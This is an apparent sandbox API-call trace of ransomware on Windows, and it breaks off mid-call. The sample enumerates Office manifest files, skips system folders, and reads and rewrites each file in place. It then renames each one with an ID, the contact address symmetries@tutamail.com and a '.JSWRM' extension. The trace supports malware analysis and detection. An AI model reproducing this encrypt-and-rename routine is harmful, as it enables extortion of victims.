(lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.023] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.023] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.023] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.023] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.023] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.023] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.023] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0072.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0072.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.024] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=387356) returned 1 [0072.024] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.024] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.038] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.038] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.038] CloseHandle (hObject=0x458) returned 1 [0072.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0072.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0072.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0072.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0072.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.039] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.040] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8351d7a8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8351d7a8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e3474a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5fd, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", cAlternateFileName="APAD0B~1.XML")) returned 1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.040] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0072.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0072.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0072.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20dec0, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0072.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.041] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1533) returned 1 [0072.041] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f0) returned 0x23fc98 [0072.041] ReadFile (in: hFile=0x458, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x5f0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345ef6c*=0x5f0, lpOverlapped=0x0) returned 1 [0072.042] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.042] WriteFile (in: hFile=0x458, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345ef68*=0x5f0, lpOverlapped=0x0) returned 1 [0072.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0072.042] CloseHandle (hObject=0x458) returned 1 [0072.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0072.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0072.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0072.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0072.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.043] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0072.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.043] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x838fd5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x838fd5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc3863, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", cAlternateFileName="APEDE2~1.XML")) returned 1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.044] lstrcmpiW (lpString1="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0072.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0072.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0072.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0072.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0072.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.045] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=800867) returned 1 [0072.045] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.045] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.059] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.059] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.059] CloseHandle (hObject=0x458) returned 1 [0072.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0072.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0072.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0072.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0072.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0072.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.060] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft 